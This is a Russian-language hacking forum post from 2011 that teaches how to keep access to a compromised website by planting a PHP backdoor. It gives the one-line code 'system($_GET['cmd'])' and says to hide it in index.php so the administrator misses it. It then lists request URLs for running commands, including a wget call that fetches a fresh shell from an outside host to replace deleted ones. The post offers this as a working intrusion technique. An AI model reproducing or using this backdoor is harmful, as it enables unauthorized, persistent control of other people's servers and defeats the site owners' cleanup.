Регистрация Главная Сообщество
Сообщения за день Справка Регистрация

Это страшное слово "бэкдор"

-

Базы серверов и брут

- Все, что связано с брутом и работой с базами данных

Закрытая тема
 
Опции темы
Старый 04.08.2011, 11:41   #1
 Рыцарь-капитан
Аватар для ~Nero~
 
~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания
Регистрация: 17.02.2010
Сообщений: 550
Популярность: 2278
Золото Zhyk.Ru: 35
Сказал(а) спасибо: 1,110
Поблагодарили 915 раз(а) в 329 сообщениях
Отправить сообщение для ~Nero~ с помощью ICQ
 
По умолчанию Это страшное слово "бэкдор"

Бэкдор
Посидел,подумал и решил всетаки написать...
Для начала определение:
Код:
Бэкдор, backdoor (от англ. back door, чёрный ход) — программы, которые устанавливает взломщик на взломанном им компьютере после получения первоначального доступа с целью повторного получения доступа к системе. При подключении предоставляет какой-либо доступ к системе (как правило, это командный интерпретатор: в GNU/Linux — Bash, в Microsoft Windows NT — cmd). Взято с вики
Перейдем к примеру.
Для чего же нужны бэкдоры? Предположим такую ситуацию - вы взломали сайт, залили шелл, слили базу и т.д., но админ нашел шелл и удалил его, так вот, для этой беспалевности и нужен бэкдор. Просто вставим малозаметный код и все, админ не пропалит.
Ну а теперь более подробно:
Код самого простейшего бэкдора:
Код:
<?php 
system($_GET['cmd']); 
?>
Допустим вы залили шелл,ищем любой файл с расширением .php ,который можно редактировать. Для этой роли блестяще подойдет index.php . Открываем файл, вставляем код и сохраняем. Надо обратить внимание на то, что index.php уже имеет "<?php" и "?>" ,так что их вставлять не надо.
Далее...
Переходим на наш сайт (условно _http://site.ru/index.php) и видим что ничего не происходит....
Но стоит нам перейти на _http://site.ru/index.php?cmd=dir мы видим список файлов находящихся в директории. Вуаля)
самые важные для нас функции бэкдора это:
_http://site.ru/index.php?cmd=dir - как мы уже знаем, показывает список файлов в директории
_http://site.ru/index.php?cmd=info - узнаем phpinfo
_http://site.ru/index.php?cmd=wget [Ссылки могут видеть только зарегистрированные пользователи. ] - а этот запрос повторно заливает шелл (хочу заметить, что пробел в ссылке обязателен!), на случай если все шеллы которые вы заливали удалил админ. Этот шелл будет доступен по адресу _http://site.ru/0001.php
Я знаю что найдутся те,которые чего то не поняли в последней ссылке,так вот вам скрин
[Ссылки могут видеть только зарегистрированные пользователи. ]

Ахтунг!(внимание!) "http://xaker9316.narod.ru/0001.php"-это ссылка тоже условная,вместо нее должна быть ссылка на ваш шелл.
Ну вот и все) Спасибо за внимание.
Специально для Zhyk.ru
________________

[Ссылки могут видеть только зарегистрированные пользователи. ]

Халявные 50 рублей!

Последний раз редактировалось ~Nero~; 04.08.2011 в 11:58.
 
5 пользователя(ей) сказали cпасибо:
BabkaMan (04.08.2011), Dominian (06.11.2011), pr0m0 (04.08.2011), we12233122 (11.08.2011), YanоО (04.08.2011)
Закрытая тема


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Информация] """""""""""Лучшая тема по итогам голосования"""""""""" +ESEL- Общение и обсуждение, архив Point Blank 0 16.04.2011 09:12
[Руководство] "Воизбежание"-"Логин в прцессе подключения"+"Дисконект при выборе сервера" K.Rezonans Баги, читы и статьи по Point Blank 19 27.06.2010 02:24

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 07:12.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net